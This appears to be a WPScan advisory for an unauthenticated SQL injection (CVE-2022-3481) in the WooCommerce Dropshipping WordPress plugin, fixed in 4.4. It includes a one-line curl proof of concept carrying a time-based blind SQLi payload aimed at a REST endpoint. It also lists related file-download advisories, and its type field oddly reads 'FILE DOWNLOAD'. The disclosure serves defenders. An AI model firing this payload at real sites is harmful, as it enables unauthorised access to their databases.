WooCommerce Dropshipping < 4.4 – Unauthenticated SQLi | CVE 2022-3481 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via a REST endpoint available to unauthenticated users, leading to a SQL injection

Proof of Concept

curl -isk -X 'POST' -H "Content-Type: application/json" --data '{"sku":"a\" AND (SELECT 42 FROM (SELECT(SLEEP(5)))wlHd)-- pOeU"}' 'https://example.com/wp-json/woo-aliexpress/v1/product-sku'

Affects Plugins

woocommerce-dropshipping

Fixed in 4.4

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

c5e395f8-257e-49eb-afbd-9c1e26045373

Timeline

Publicly Published

2022-10-17 (about 3 years ago)

Added

2022-10-17 (about 3 years ago)

Last Updated

2022-10-17 (about 3 years ago)

Other

Published

Title

Published

2024-07-09

Title

Secure Downloads < 1.2.3 - Admin+ Arbitrary File Download

Published

2021-02-13

Title

Theme Editor < 2.6 - Authenticated Arbitrary File Download

Published

2022-08-17

Title

All-in-One Video Gallery 2.5.8 - 2.6.0 - Unauthenticated Arbitrary File Download & SSRF

Published

2022-07-12

Title

WSM Downloader <= 1.4.0 - Unauthenticated Arbitrary File Download

Published

2019-06-02

Title

Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download